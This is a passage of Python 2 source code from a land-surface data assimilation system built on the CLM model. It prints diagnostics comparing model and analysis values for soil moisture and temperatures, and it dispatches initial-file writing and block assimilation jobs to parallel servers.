elif Variable_Assimilation_Flag[Variable_List.index(SensorVariable_Sub)] and SensorVariable_Sub == "Surface_Temperature":
print "Vegetation_Temperature","Model",numpy.mean(CLM_Vegetation_Temperature_Ensemble_Mat_Copy[Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0],:]),\
"Analysis",numpy.mean(CLM_Vegetation_Temperature_Ensemble_Mat[Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0],:]),\
"Analysis-Model",numpy.mean(CLM_Vegetation_Temperature_Ensemble_Mat[Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0],:])-numpy.mean(CLM_Vegetation_Temperature_Ensemble_Mat_Copy[Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0],:])
print "Ground_Temperature","Model",numpy.mean(CLM_Ground_Temperature_Ensemble_Mat_Copy[Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0],:]),\
"Analysis",numpy.mean(CLM_Ground_Temperature_Ensemble_Mat[Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0],:]),\
"Analysis-Model",numpy.mean(CLM_Ground_Temperature_Ensemble_Mat[Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0],:])-numpy.mean(CLM_Ground_Temperature_Ensemble_Mat_Copy[Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0],:])
for Soil_Layer_Index in range(Soil_Layer_Num):
print "Soil_Layer_Index",Soil_Layer_Index,"Model",numpy.mean(CLM_Soil_Temperature_Ensemble_Mat_Copy[Soil_Layer_Index,Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0],:]),\
"Analysis",numpy.mean(CLM_Soil_Temperature_Ensemble_Mat[Soil_Layer_Index,Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0],:]),\
"Analysis-Model",numpy.mean(CLM_Soil_Temperature_Ensemble_Mat[Soil_Layer_Index,Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0],:])-numpy.mean(CLM_Soil_Temperature_Ensemble_Mat_Copy[Soil_Layer_Index,Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0],:])
if msw_infl < 0.0:
print "Vegetation_Temperature","Model_parm_infl",numpy.mean(CLM_Vegetation_Temperature_parm_infl_Copy[Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0]]),\
"Analysis_parm_infl",numpy.mean(CLM_Vegetation_Temperature_parm_infl[Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0]]),\
"Analysis-Model",numpy.mean(CLM_Vegetation_Temperature_parm_infl[Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0]])-numpy.mean(CLM_Vegetation_Temperature_parm_infl_Copy[Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0]])
print "Ground_Temperature","Model_parm_infl",numpy.mean(CLM_Ground_Temperature_parm_infl_Copy[Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0]]),\
"Analysis_parm_infl",numpy.mean(CLM_Ground_Temperature_parm_infl[Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0]]),\
"Analysis-Model",numpy.mean(CLM_Ground_Temperature_parm_infl[Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0]])-numpy.mean(CLM_Ground_Temperature_parm_infl_Copy[Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0]])
for Soil_Layer_Index in range(Soil_Layer_Num):
print "Soil_Layer_Index",Soil_Layer_Index,"Model_parm_infl",numpy.mean(CLM_Soil_Temperature_parm_infl_Copy[Soil_Layer_Index,Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0]]),\
"Analysis_parm_infl",numpy.mean(CLM_Soil_Temperature_parm_infl[Soil_Layer_Index,Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0]]),\
"Analysis-Model",numpy.mean(CLM_Soil_Temperature_parm_infl[Soil_Layer_Index,Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0]])-numpy.mean(CLM_Soil_Temperature_parm_infl_Copy[Soil_Layer_Index,Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0]])
if Feedback_Assim: # and (string.atoi(Stop_Month) >= 4) and (string.atoi(Stop_Month) <= 10):
Prop_Grid_Array_Sys_Copy = NC_File_Out_Assimilation_2_Initial_Copy.variables['Prop_Grid_Array_Sys'][:, :, :, :]
Prop_Grid_Array_H_Trans = NC_File_Out_Assimilation_2_Initial.variables['Prop_Grid_Array_H_Trans'][:, :, :, :]
for Ens_Index in range(Ensemble_Number):
SysModel_Mat_Ens = Prop_Grid_Array_Sys_Copy[Ens_Index, Variable_List.index("Soil_Moisture"), :, :]
ObsModel_Mat_Ens = Prop_Grid_Array_H_Trans[Ens_Index, Variable_List.index("Surface_Temperature"), :, :]
#ObsModel_Mat = numpy.ma.masked_where(ObsModel_Mat == 0, ObsModel_Mat)
print "Ens_Index",Ens_Index,"SysModel:",SysModel_Mat_Ens[Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0]],"ObsModel:",ObsModel_Mat_Ens[Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0]],\
"Analysis:",Analysis_Grid_Array[Ens_Index,Prop_Grid_Array_Sys_Index,Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0]]
del Prop_Grid_Array_Sys_Copy,Prop_Grid_Array_H_Trans
for Soil_Layer_Index in range(Soil_Layer_Num - 5):
print "Soil_Layer_Index",Soil_Layer_Index,"Model",numpy.mean(CLM_Soil_Moisture_Ensemble_Mat_Copy[Soil_Layer_Index,Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0],:]),\
"Analysis",numpy.mean(CLM_Soil_Moisture_Ensemble_Mat[Soil_Layer_Index,Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0],:]),\
"Analysis-Model",numpy.mean(CLM_Soil_Moisture_Ensemble_Mat[Soil_Layer_Index,Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0],:])-numpy.mean(CLM_Soil_Moisture_Ensemble_Mat_Copy[Soil_Layer_Index,Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0],:])
if msw_infl < 0.0:
print "Soil_Layer_Index",Soil_Layer_Index,"Model_parm_infl",numpy.mean(CLM_Soil_Moisture_parm_infl_Copy[Soil_Layer_Index,Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0]]),\
"Analysis_parm_infl",numpy.mean(CLM_Soil_Moisture_parm_infl[Soil_Layer_Index,Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0]]),\
"Analysis-Model",numpy.mean(CLM_Soil_Moisture_parm_infl[Soil_Layer_Index,Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0]])-numpy.mean(CLM_Soil_Moisture_parm_infl_Copy[Soil_Layer_Index,Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0]])
print "******************************************************** Station Statistics"
Prop_Grid_Array_Sys_Copy = NC_File_Out_Assimilation_2_Initial_Copy.variables['Prop_Grid_Array_Sys'][:, :, :, :]
for Ens_Index in range(Ensemble_Number):
Model_State = numpy.ma.masked_where(Mask_Index[Prop_Grid_Array_Sys_Index, ::], Prop_Grid_Array_Sys_Copy[Ens_Index, Prop_Grid_Array_Sys_Index, :, :])
Analysis_Grid_Temp = numpy.ma.masked_where(Mask_Index[Prop_Grid_Array_Sys_Index, ::], Analysis_Grid_Array[Ens_Index,Prop_Grid_Array_Sys_Index,::])
Analysis_Grid_Temp = numpy.ma.masked_where(Analysis_Grid_Temp == NAvalue, Analysis_Grid_Temp)
print "Min Model:", Model_State.min(), "Max Model:", Model_State.max(), "Min Analysis:", Analysis_Grid_Temp.min(), "Max Analysis:", Analysis_Grid_Temp.max()
#Analysis_Grid[numpy.where(Analysis_Grid[Prop_Grid_Array_Sys_Index,::] == NAvalue)] = CLM_NA
numexpr_a = Analysis_Grid_Array[Ens_Index,Prop_Grid_Array_Sys_Index,::]
numexpr_b = NAvalue
numexpr_c = numpy.where(numexpr_a == numexpr_b)
NA_Index_Analysis_Grid = numexpr_c
Analysis_Grid_Array[Ens_Index,Prop_Grid_Array_Sys_Index,::][NA_Index_Analysis_Grid] = numpy.mean(Analysis_Grid_Array[Ens_Index,Prop_Grid_Array_Sys_Index,::][NA_Index_Analysis_Grid])
print "Finish the Analysis of", Analysis_Variable_Name[Prop_Grid_Array_Sys_Index]
print "Dim NA_Value of Analysis", numpy.size(numpy.where(Analysis_Grid[Prop_Grid_Array_Sys_Index,::] == NAvalue))
NC_File_Out_Assimilation_2_Initial.close()
NC_File_Out_Assimilation_2_Initial_Copy.close()
del Prop_Grid_Array_Sys_Copy
#os.abort()
numexpr_a = Analysis_Grid[Prop_Grid_Array_Sys_Index,::]
numexpr_b = NAvalue
numexpr_c = numpy.where(numexpr_a == numexpr_b)
NA_Index_Analysis_Grid = numexpr_c
OutputDate=Stop_Year+ Stop_Month+Stop_Day
if Write_DA_File_Flag:
if not os.path.exists(DasPy_Path+"Analysis/DAS_Temp/"+Region_Name+"/Localization_Map_Mask"):
os.makedirs(DasPy_Path+"Analysis/DAS_Temp/"+Region_Name+"/Localization_Map_Mask")
Localization_Map_Mask_File_Name = DasPy_Path+"Analysis/DAS_Temp/"+Region_Name+"/Localization_Map_Mask/Localization_Map_Mask_"+SensorVariable_Sub+"_"+OutputDate+".txt"
numpy.savetxt(Localization_Map_Mask_File_Name,Localization_Map_Mask[Prop_Grid_Array_Sys_Index,::])
if Def_Write_Initial:
if Def_PP and Ensemble_Number > 1:
print "********************************************** Using PP to Accelerate Write_Initial_File"
if PDAF_Assim_Framework == 2: # Restart PP sever after PDAF MPI
job_server_node_array, active_nodes_server, PROCS_PER_NODE, PP_Port, PP_Servers_Per_Node = DAS_Driver_Common.Start_ppserver(mpi4py_comm, mpi4py_rank, mpi4py_name, DAS_Output_Path, Ensemble_Number, DAS_Depends_Path, active_nodes_server, Def_Region, NSLOTS, Def_Print, DasPy_Path, Def_PP, Def_CESM_Multi_Instance, PP_Port)
while len(job_server_node_array) < 1:
job_server_node_array = DAS_Driver_Common.Stop_ppserver(mpi4py_rank, Def_PP, DAS_Depends_Path, job_server_node_array, NSLOTS, DasPy_Path, active_nodes_server, PP_Servers_Per_Node)
job_server_node_array, active_nodes_server, PROCS_PER_NODE, PP_Port, PP_Servers_Per_Node = DAS_Driver_Common.Start_ppserver(mpi4py_comm, mpi4py_rank, mpi4py_name, DAS_Output_Path, Ensemble_Number, DAS_Depends_Path, active_nodes_server, Def_Region, NSLOTS, Def_Print, DasPy_Path, Def_PP, Def_CESM_Multi_Instance, PP_Port)
Job_Num_Per_Node = int(numpy.ceil(float(Ensemble_Number) / len(active_nodes_server)))
print "The following submits",Job_Num_Per_Node,"jobs on each node and then retrieves the results"
if Job_Num_Per_Node == 0:
Job_Num_Per_Node = 1
job_server_node_results = []
Ens_Index = 0
Job_Num_Per_Node_Index = 0
while Job_Num_Per_Node_Index < Job_Num_Per_Node and Ens_Index < Ensemble_Number:
for Node_Index in range(len(active_nodes_server)):
job_server_node = job_server_node_array[numpy.min([Job_Num_Per_Node_Index+Node_Index*len(job_server_node_array)/len(active_nodes_server),len(job_server_node_array)-1])]
#job_server_node = job_server_node_array[Node_Index]
if Ens_Index > Ensemble_Number - 1:
break
job_server_node_results.append(job_server_node.submit(Write_Initial_File, args=(Ens_Index, Model_Driver, Def_PP, DasPy_Path, Run_Dir_Array, Soil_Layer_Num, ParFlow_Layer_Num, numrad, Row_Numbers, Col_Numbers, finidat_name, SensorVariable_Sub, Variable_ID_Sub, CLM_NA, Feedback_Assim, Stop_Month, Stop_Hour, UTC_Zone, \
pft_len,maxpft, Def_Region, DAS_Data_Path, Region_Name, Crop_Sum, SensorType_Sub, Row_Numbers_String, Col_Numbers_String, \
Snow_Layer_Num, column_len, Mask_Index_Sub, Def_Print, Def_ParFor, dtime, irrig_nsteps_per_day, PFT_Num, NAvalue, Density_of_liquid_water, Freezing_temperature_of_fresh_water, Density_of_ice, \
DAS_Depends_Path, omp_get_num_procs_ParFor, Soil_Layer_Index_DA, Variable_Assimilation_Flag, Variable_List, \
NC_FileName_Assimilation_2_Constant, NC_FileName_Assimilation_2_Diagnostic, NC_FileName_Assimilation_2_Initial, NC_FileName_Assimilation_2_Initial_Copy, NC_FileName_Assimilation_2_Bias, NC_FileName_Assimilation_2_Bias_Copy, fpftcon_name, finidat_name_string),
depfuncs=(Check_Outliers,),
modules=("numpy", "netCDF4", "sys", "os", "re", "unittest", "time", "datetime", "shutil", "fnmatch", "subprocess", "string", "socket", "gc", "imp", "getpass", "calendar","scipy.stats", 'scipy.weave'), group='Write_Initial_File'))
Ens_Index = Ens_Index + 1
Job_Num_Per_Node_Index = Job_Num_Per_Node_Index + 1
for job_server_node in job_server_node_array:
job_server_node.wait()
if Def_Print >= 2:
job_server_node.print_stats()
if Def_Print:
if len(job_server_node_results) > 0:
for job in job_server_node_results:
job_index = job_server_node_results.index(job)
if job_index > (Ensemble_Number - 1):
break
print "Results of ",job_index,"is", job()
else: # ********* Run Read_History_File Sequentially
for Ens_Index in range(Ensemble_Number):
Write_Initial_File(Ens_Index, Model_Driver, Def_PP, DasPy_Path, Run_Dir_Array, Soil_Layer_Num, ParFlow_Layer_Num, numrad, Row_Numbers, Col_Numbers, finidat_name, SensorVariable_Sub, Variable_ID_Sub, CLM_NA, Feedback_Assim, Stop_Month, Stop_Hour, UTC_Zone, \
pft_len, maxpft, Def_Region, DAS_Data_Path, Region_Name, Crop_Sum, SensorType_Sub, Row_Numbers_String, Col_Numbers_String, \
Snow_Layer_Num, column_len, Mask_Index_Sub, Def_Print, Def_ParFor, dtime, irrig_nsteps_per_day, PFT_Num, NAvalue, Density_of_liquid_water, Freezing_temperature_of_fresh_water, Density_of_ice, \
DAS_Depends_Path, omp_get_num_procs_ParFor, Soil_Layer_Index_DA, Variable_Assimilation_Flag, Variable_List,
NC_FileName_Assimilation_2_Constant, NC_FileName_Assimilation_2_Diagnostic, NC_FileName_Assimilation_2_Initial, NC_FileName_Assimilation_2_Initial_Copy, NC_FileName_Assimilation_2_Bias, NC_FileName_Assimilation_2_Bias_Copy, fpftcon_name, finidat_name_string)
gc.collect()
del gc.garbage[:]
return Analysis_Grid, Initial_Perturbation_SM_Flag, Initial_Perturbation_ST_Flag, job_server_node_array, active_nodes_server
def Parameter_Update(mpi4py_comm, mpi4py_rank, mpi4py_name, gelmna_threshold, Optimized_Parameter_Index, Model_Driver, NSLOTS,Def_PP, Def_First_Run, Def_Print, Feedback_Assim, Def_Par_Optimized, Parameter_Optimization, Parameter_Regularization, Par_Soil_Uniform_STD_Sub, Par_Veg_Uniform_STD_Sub, Par_PFT_Uniform_STD_Sub, Par_Hard_Uniform_STD_Sub,
Dim_Soil_Par, Dim_Veg_Par, Dim_PFT_Par, Dim_Hard_Par, SensorQuantity_Sub, SensorType_Sub, SensorVariable_Sub, SensorResolution_Sub, Variable_ID_Sub, QC_ID_Sub, Variable_List, maxpft, \
Row_Numbers, Col_Numbers, Ensemble_Number, Ensemble_Number_Predict, Dim_Obs_Type, Observation_Matrix, Observation_Longitude, Observation_Latitude, job_server_node_array, active_nodes_server, ntasks_CLM,
Mask, Mask_Index, NAvalue, COSMOS_Circle_Array, COSMOS_Circle_Index_Array, COSMOS_Circle_Num_Array, Soil_Texture_Layer_Opt_Num, Soil_Sand_Clay_Sum, Parameter_Range_Soil, Parameter_Range_Veg, Parameter_Range_PFT, Parameter_Range_Hard, Par_Index_Increment_Soil_Par, DasPy_Path, \
Variable_Assimilation_Flag, DAS_Depends_Path, Def_ParFor, omp_get_num_procs_ParFor, Def_CDF_Matching, Normal_Score_Trans, PDAF_Assim_Framework, PDAF_Filter_Type, PP_Servers_Per_Node, Def_CESM_Multi_Instance, PP_Port, \
Plot_Analysis, Soil_Layer_Index_DA, Initial_Perturbation_SM_Flag, Initial_Perturbation_ST_Flag, Post_Inflation_Alpha_Par, \
Soil_Par_Sens_Array, Veg_Par_Sens_Array, PFT_Par_Sens_Array, Hard_Par_Sens_Array, Datetime_Start, Datetime_Initial, Low_Ratio_Par, High_Ratio_Par, Low_Ratio_Par_Uniform, High_Ratio_Par_Uniform, Write_DA_File_Flag,
r, Observation_Box, Def_Region, Dim_CLM_State, Num_Local_Obs, Model_Variance, DateString_Plot,
Def_Multiresolution, Def_ReBEL, Def_Localization, Assim_Algorithm_Name, eps, msw_infl, Region_Name, Call_Gstat_Flag, MODEL_X_Left, MODEL_X_Right, MODEL_Y_Lower, MODEL_Y_Upper, Proj_String, MODEL_CEA_X, MODEL_CEA_Y, Z_Resolution,
dtime, Irrigation_Hours, column_len, Weather_Forecast_Days, Datetime_End, Hydraulic_File_Name, fpftcon_name, Run_Dir_Array,
Model_State_Inflation_Range, Model_State_Inflation_Range_STD, Model_Bias_Range, Observation_Bias_Range, Model_Bias_Range_STD, Observation_Bias_Range_STD, Model_Bias_STD, Observation_Bias_STD, Dim_Observation_Quantity,
Snow_Layer_Num, Def_Write_Initial, cols1d_ixy, cols1d_jxy, cols1d_ityplun, pfts1d_ityplun, Freezing_temperature_of_fresh_water, Density_of_ice, N0, nlyr,
Sub_Block_Ratio_Row, Sub_Block_Ratio_Col, Sub_Block_Index_Row_Mat_Vector, Sub_Block_Index_Col_Mat_Vector, Row_Offset, Col_Offset,
Row_Numbers_SubBlock_Array, Col_Numbers_SubBlock_Array, Sub_Block_Row_Start_Array, Sub_Block_Row_End_Array, Sub_Block_Col_Start_Array, Sub_Block_Col_End_Array,
diskless_flag, persist_flag, Irrig_Scheduling, Run_Dir_Home, Start_Month, Stop_Year, Stop_Month, Stop_Day, Stop_Hour, UTC_Zone, finidat_name, Density_of_liquid_water, Irrigation_Grid_Flag_Array,
mksrf_edgee, mksrf_edges, mksrf_edgew, mksrf_edgen, Datetime_Stop, Datetime_Stop_Init, CLM_NA,
Observation_Variance, Observation_NLons, Observation_NLats, Observation_X_Left, Observation_X_Right, Observation_Y_Lower, Observation_Y_Upper, Observation_Corelation_Par, octave, Station_XY, Station_XY_Index, Soil_Layer_Num, Analysis_Variable_Name,
Analysis_Grid, Localization_Map_Mask, ObsModel_Mat, ObsModel_Variance_Mat, Mask_Sub, Mask_Index_Sub, Mask_Index_Vector, Observation_Matrix_Index, Prop_Grid_Array_Sys_Index, Model_State,
SensorQuantity_Index, E0_ObsModel_Mask, Soil_Par_Sens, Veg_Par_Sens, PFT_Par_Sens, Hard_Par_Sens, Soil_Par_Accum_Dim, Veg_Par_Accum_Dim, PFT_Par_Accum_Dim, Hard_Par_Accum_Dim, ParFlow_Layer_Num,
Forcing_File_Path, Observation_Path, DAS_Data_Path, Grid_Resolution_CEA, Grid_Resolution_GEO, NC_FileName_Assimilation_2_Constant, NC_FileName_Assimilation_2_Diagnostic, NC_FileName_Assimilation_2_Initial,
NC_FileName_Assimilation_2_Initial_Copy, NC_FileName_Assimilation_2_Bias, NC_FileName_Assimilation_2_Bias_Copy, NC_FileName_Assimilation_2_Bias_Monthly, NC_FileName_Assimilation_2_Bias_Monthly_Copy,
NC_FileName_Assimilation_2_Parameter, NC_FileName_Assimilation_2_Parameter_Copy, NC_FileName_Assimilation_2_Parameter_Obs_Dim,
NC_FileName_Assimilation_2_Parameter_Monthly, NC_FileName_Assimilation_2_Parameter_Monthly_Copy, NC_FileName_Parameter_Space_Single, DAS_Output_Path, \
COSMIC_Py, window, memory_profiler, COSMIC, Observation_Time_File_Path):
NC_File_Parameter_Space_Single = netCDF4.Dataset(NC_FileName_Parameter_Space_Single,'r')
Bias_Estimation_Option_Model_Par = numpy.asarray([0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]) # Model Bias
Bias_Estimation_Option_Obs_Par = numpy.asarray([0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]) # Observation Bias
print "Optimized_Parameter_Index",Optimized_Parameter_Index
if Def_Print >= 4:
NC_File_Out_Assimilation_2_Parameter = netCDF4.Dataset(NC_FileName_Assimilation_2_Parameter, 'r')
print NC_File_Parameter_Space_Single.variables['Parameter_Soil_Space_Single'][:,:,:], NC_File_Out_Assimilation_2_Parameter.variables['Parameter_Soil_Space_Ensemble'][:,:,:,:]
NC_File_Out_Assimilation_2_Parameter.close()
# Split the Block into SubBlocks to do data assimilation
Soil_Par_Sens_Dim = numpy.size(numpy.where(Soil_Par_Sens == True))
Veg_Par_Sens_Dim = 0
PFT_Par_Sens_Dim = 0
Hard_Par_Sens_Dim = 0
if Soil_Par_Sens_Dim >= 1:
Soil_Par_Accum_Dim = Soil_Par_Accum_Dim + 1
Optimized_Parameter_Index[0] = Optimized_Parameter_Index[0] + 1
print "**********************************************************************Optimize Soil Parameter"
if Parameter_Optimization == 2:
print "############################## Parameter Estimation using Augmentation"
Parameter_Optimization_Flag = 1
if Def_PP and (not PDAF_Assim_Framework == 2) and (Sub_Block_Ratio_Row*Sub_Block_Ratio_Col) > 1 and len(active_nodes_server) > 1:
print "********************************************** Using PP to Accelerate Block_Assim"
Job_Num_Per_Node = int(numpy.ceil(float(Sub_Block_Ratio_Row*Sub_Block_Ratio_Col) / len(active_nodes_server)))
print "The following submits",Job_Num_Per_Node,"jobs on each node and then retrieves the results"
if Job_Num_Per_Node == 0:
Job_Num_Per_Node = 1
job_server_node_results = []
job_server_node_results_wise = [[] for i in range(len(active_nodes_server))]
# The following submits 1 job to 1 node and then retrieves the results
print "+++++++++++++++++ The following submits",Job_Num_Per_Node,"jobs to 1 node and then retrieves the results"
Block_Index = 0
Node_Status = numpy.zeros(len(active_nodes_server),dtype=numpy.bool)
Node_Status[:] = True
while Block_Index < Sub_Block_Ratio_Row*Sub_Block_Ratio_Col:
if numpy.size(numpy.where(Node_Status==True)) > 0:
Node_Index = numpy.where(Node_Status==True)[0][0]
print "***********************Node_Index",Node_Index,"Block_Index",Block_Index,"is submitted!"
job_server_node = job_server_node_array[numpy.min([Node_Index*len(job_server_node_array)/len(active_nodes_server),len(job_server_node_array)-1])]
job_server_node_results.append(job_server_node.submit(Block_Assim, args=(Block_Index, Model_Driver, Sub_Block_Index_Row_Mat_Vector, Sub_Block_Index_Col_Mat_Vector, Row_Numbers, Col_Numbers, Sub_Block_Ratio_Row, Sub_Block_Ratio_Col, Row_Offset, Col_Offset,
Row_Numbers_SubBlock_Array, Col_Numbers_SubBlock_Array, Sub_Block_Row_Start_Array, Sub_Block_Row_End_Array, Sub_Block_Col_Start_Array, Sub_Block_Col_End_Array,
Start_Month, Stop_Month, Stop_Day, Stop_Hour, UTC_Zone, MODEL_X_Left, MODEL_X_Right, MODEL_Y_Lower, MODEL_Y_Upper, Ensemble_Number, Prop_Grid_Array_Sys_Index,
Dim_Observation_Quantity, SensorQuantity_Index, Observation_Box, Model_State_Inflation_Range, Model_State_Inflation_Range_STD, Model_Bias_Range, Observation_Bias_Range, Model_Bias_Range_STD, Observation_Bias_Range_STD, Model_Bias_STD, Observation_Bias_STD,
Variable_List, Observation_Matrix_Index, Soil_Layer_Num, ParFlow_Layer_Num, SensorVariable_Sub, SensorType_Sub, SensorQuantity_Sub, SensorResolution_Sub,
Variable_Assimilation_Flag, Soil_Layer_Index_DA, Feedback_Assim, Parameter_Optimization_Flag, Soil_Par_Sens, Veg_Par_Sens, PFT_Par_Sens, Hard_Par_Sens, Dim_CLM_State, maxpft, Normal_Score_Trans, PDAF_Assim_Framework, PDAF_Filter_Type,
Def_First_Run, Def_Print, Def_PP, Def_Multiresolution, Def_ReBEL, Def_Localization, Num_Local_Obs[Prop_Grid_Array_Sys_Index], eps, msw_infl, Post_Inflation_Alpha_Par, Def_ParFor, Ensemble_Number_Predict,
Call_Gstat_Flag, diskless_flag, persist_flag, Assim_Algorithm_Name, Proj_String, Z_Resolution, Observation_X_Left, Observation_X_Right, Observation_Y_Lower, Observation_Y_Upper,
Grid_Resolution_CEA, Write_DA_File_Flag, Datetime_Start, Datetime_Stop, Datetime_Stop_Init, Datetime_Initial, Region_Name, NSLOTS,
Observation_Corelation_Par, Bias_Estimation_Option_Model_Par, Bias_Estimation_Option_Obs_Par, Low_Ratio_Par, High_Ratio_Par,
Dim_Soil_Par, Dim_Veg_Par, Dim_PFT_Par, Dim_Hard_Par, Soil_Par_Sens_Dim, Veg_Par_Sens_Dim, PFT_Par_Sens_Dim, Hard_Par_Sens_Dim, Soil_Texture_Layer_Opt_Num, Soil_Sand_Clay_Sum, Parameter_Range_Soil, Parameter_Range_Veg, Parameter_Range_PFT, Parameter_Range_Hard, Parameter_Regularization, Par_Soil_Uniform_STD_Sub, Par_Veg_Uniform_STD_Sub, Par_PFT_Uniform_STD_Sub, Par_Hard_Uniform_STD_Sub, DateString_Plot,
DAS_Depends_Path, DasPy_Path, CLM_NA, NAvalue, omp_get_num_procs_ParFor, Def_CDF_Matching, Plot_Analysis, NC_FileName_Assimilation_2_Constant, NC_FileName_Assimilation_2_Diagnostic, NC_FileName_Assimilation_2_Initial,
NC_FileName_Assimilation_2_Bias, NC_FileName_Assimilation_2_Parameter, NC_FileName_Parameter_Space_Single, DAS_Output_Path),
depfuncs=(CLM_Assim_Common, Check_Outliers, ParFor_PFT, ParFor_PFT_Block_Assim, ParFor_Fusion, ParFor_H_Operator, ParFor_Texture_Check, ParFor_Check_Outliers, ParFor_Check_Outliers_NA,),
modules=("numpy", "netCDF4", "sys", "os", "re", "gc", "imp", "unittest", "time", "datetime", "shutil", "fnmatch", "subprocess", "string", "socket", "getpass", "calendar", "glob","scipy.stats",'scipy.weave'), group='Block_Assim'))
job_server_node_results_wise[Node_Index] = job_server_node_results[Block_Index]
Node_Status[Node_Index] = False
Block_Index = Block_Index + 1
if Block_Index >= len(active_nodes_server):
for job in job_server_node_results_wise:
if job != [] and job.finished:
Node_Index = job_server_node_results_wise.index(job)
print "*********************************************************************Node_Index",Node_Index,"is finished!"
Node_Status[Node_Index] = True
job_server_node_results_wise[Node_Index] = []
for job_server_node in job_server_node_array:
job_server_node.wait()
if Def_Print >= 2:
job_server_node.print_stats()
if Def_Print:
if len(job_server_node_results) > 0:
for job in job_server_node_results:
job_index = job_server_node_results.index(job)
if job_index > (Ensemble_Number - 1):
break
print "Results of ",job_index,"is", job()
else:
print "********* Run Block_Assim Sequentially"
if PDAF_Assim_Framework == 2:
DAS_Driver_Common.Stop_ppserver(mpi4py_rank, Def_PP, DAS_Depends_Path, job_server_node_array, NSLOTS, DasPy_Path, active_nodes_server, PP_Servers_Per_Node)
for Block_Index in range(Sub_Block_Ratio_Row*Sub_Block_Ratio_Col):
Block_Assim(Block_Index, Model_Driver, Sub_Block_Index_Row_Mat_Vector, Sub_Block_Index_Col_Mat_Vector, Row_Numbers, Col_Numbers, Sub_Block_Ratio_Row, Sub_Block_Ratio_Col, Row_Offset, Col_Offset,
Row_Numbers_SubBlock_Array, Col_Numbers_SubBlock_Array, Sub_Block_Row_Start_Array, Sub_Block_Row_End_Array, Sub_Block_Col_Start_Array, Sub_Block_Col_End_Array,
Start_Month, Stop_Month, Stop_Day, Stop_Hour, UTC_Zone, MODEL_X_Left, MODEL_X_Right, MODEL_Y_Lower, MODEL_Y_Upper, Ensemble_Number, Prop_Grid_Array_Sys_Index,
Dim_Observation_Quantity, SensorQuantity_Index, Observation_Box, Model_State_Inflation_Range, Model_State_Inflation_Range_STD, Model_Bias_Range, Observation_Bias_Range, Model_Bias_Range_STD, Observation_Bias_Range_STD, Model_Bias_STD, Observation_Bias_STD,
Variable_List, Observation_Matrix_Index, Soil_Layer_Num, ParFlow_Layer_Num, SensorVariable_Sub, SensorType_Sub, SensorQuantity_Sub, SensorResolution_Sub,
Variable_Assimilation_Flag, Soil_Layer_Index_DA, Feedback_Assim, Parameter_Optimization_Flag, Soil_Par_Sens, Veg_Par_Sens, PFT_Par_Sens, Hard_Par_Sens, Dim_CLM_State, maxpft, Normal_Score_Trans, PDAF_Assim_Framework, PDAF_Filter_Type,
Def_First_Run, Def_Print, Def_PP, Def_Multiresolution, Def_ReBEL, Def_Localization, Num_Local_Obs[Prop_Grid_Array_Sys_Index], eps, msw_infl, Post_Inflation_Alpha_Par, Def_ParFor, Ensemble_Number_Predict,
Call_Gstat_Flag, diskless_flag, persist_flag, Assim_Algorithm_Name, Proj_String, Z_Resolution, Observation_X_Left, Observation_X_Right, Observation_Y_Lower, Observation_Y_Upper,
Grid_Resolution_CEA, Write_DA_File_Flag, Datetime_Start, Datetime_Stop, Datetime_Stop_Init, Datetime_Initial, Region_Name, NSLOTS,
Observation_Corelation_Par, Bias_Estimation_Option_Model_Par, Bias_Estimation_Option_Obs_Par, Low_Ratio_Par, High_Ratio_Par,
Dim_Soil_Par, Dim_Veg_Par, Dim_PFT_Par, Dim_Hard_Par, Soil_Par_Sens_Dim, Veg_Par_Sens_Dim, PFT_Par_Sens_Dim, Hard_Par_Sens_Dim, Soil_Texture_Layer_Opt_Num, Soil_Sand_Clay_Sum, Parameter_Range_Soil, Parameter_Range_Veg, Parameter_Range_PFT, Parameter_Range_Hard, Parameter_Regularization, Par_Soil_Uniform_STD_Sub, Par_Veg_Uniform_STD_Sub, Par_PFT_Uniform_STD_Sub, Par_Hard_Uniform_STD_Sub, DateString_Plot,
DAS_Depends_Path, DasPy_Path, CLM_NA, NAvalue, omp_get_num_procs_ParFor, Def_CDF_Matching, Plot_Analysis, NC_FileName_Assimilation_2_Constant, NC_FileName_Assimilation_2_Diagnostic, NC_FileName_Assimilation_2_Initial,
NC_FileName_Assimilation_2_Bias, NC_FileName_Assimilation_2_Parameter, NC_FileName_Parameter_Space_Single, DAS_Output_Path, octave, r)
